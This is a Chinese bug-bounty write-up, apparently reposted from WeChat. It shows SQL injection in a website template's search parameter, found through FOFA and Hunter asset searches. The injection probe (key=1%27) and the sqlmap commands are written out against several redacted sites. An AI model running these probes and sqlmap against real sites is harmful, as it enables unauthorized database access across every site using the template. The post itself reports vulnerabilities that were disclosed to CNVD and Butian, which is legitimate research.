从一次事件到通杀漏洞挖掘

admin 2024年5月18日03:39:13评论20 views字数 959阅读3分11秒阅读模式

从一次事件到通杀漏洞挖掘

某天风和日丽,宜挖洞,打开FOFA直接干,翻了很久看到了这个站点,于是牵引出以下故事

body="系统" && country="CN"能打的资产贼多吧然后去偶遇,看到功能点都随手测一下

src漏洞挖掘 从一次事件到通杀漏洞挖掘

随便翻翻看 先看这个站点有哪些功能点

src漏洞挖掘 从一次事件到通杀漏洞挖掘

一眼看到搜索框 就试了试注入,害 加了个’还真报错了挖洞9分运气 这肯定有注入了嘛,注入不会 没事 有SQLmap和超级SQL

http://xxx.xx.xxx.xxx/search/?key=1%27

src漏洞挖掘 从一次事件到通杀漏洞挖掘

之后扔到sqlmap梭哈


python3 sqlmap.py -u http://xxx.xx.xxx.xxx/search/?key=1 --random-agent --batch


src漏洞挖掘 从一次事件到通杀漏洞挖掘

src漏洞挖掘 从一次事件到通杀漏洞挖掘


交完cnvd之后就想会不会有这套模板同样特征的漏洞呢

于是翻网页源代码

src漏洞挖掘 从一次事件到通杀漏洞挖掘

拿到hunter去看资产贼多

src漏洞挖掘 从一次事件到通杀漏洞挖掘

Ok通杀到手,但资产不满足5000w于是交了补天

src漏洞挖掘 从一次事件到通杀漏洞挖掘

然后漏洞复现互联网案例十例复现三案例十

1、http://www.xxxxxx.cn/search/index.html?key=1

src漏洞挖掘 从一次事件到通杀漏洞挖掘

https://www.xxxxxx.cn/search/index.html?key=1%27

src漏洞挖掘 从一次事件到通杀漏洞挖掘

判断有注入,然后sqlmap一把梭


python3 sqlmap.py -u https://www.xxx.cn/search/index.html?key=1 --random-agent --batch


src漏洞挖掘 从一次事件到通杀漏洞挖掘

2、https://www.xxxxxx.com/search/?key=1

src漏洞挖掘 从一次事件到通杀漏洞挖掘

https://www.xxxxxx.com/search/?key=1%27

src漏洞挖掘 从一次事件到通杀漏洞挖掘

还是扔进sqlmap梭哈


python3 sqlmap.py -u https://www.xxxxxx.com/search/?key=1 --random-agent --batch


src漏洞挖掘 从一次事件到通杀漏洞挖掘

3、http://www.xxxxxx.cn/search/?key=1

src漏洞挖掘 从一次事件到通杀漏洞挖掘

https://www.xxxxxx.cn/search/?key=1%27

src漏洞挖掘 从一次事件到通杀漏洞挖掘

Sqlmap梭哈


python3 sqlmap.py -u https://www.xxxxxx.cn/search/?key=1 --random-agent --batch


src漏洞挖掘 从一次事件到通杀漏洞挖掘

关注及时推送最新安全威胁资讯!

src漏洞挖掘 从一次事件到通杀漏洞挖掘

原文始发于微信公众号(Gaobai文库):src漏洞挖掘 从一次事件到通杀漏洞挖掘

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月18日03:39:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   从一次事件到通杀漏洞挖掘https://cn-sec.com/archives/2045046.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息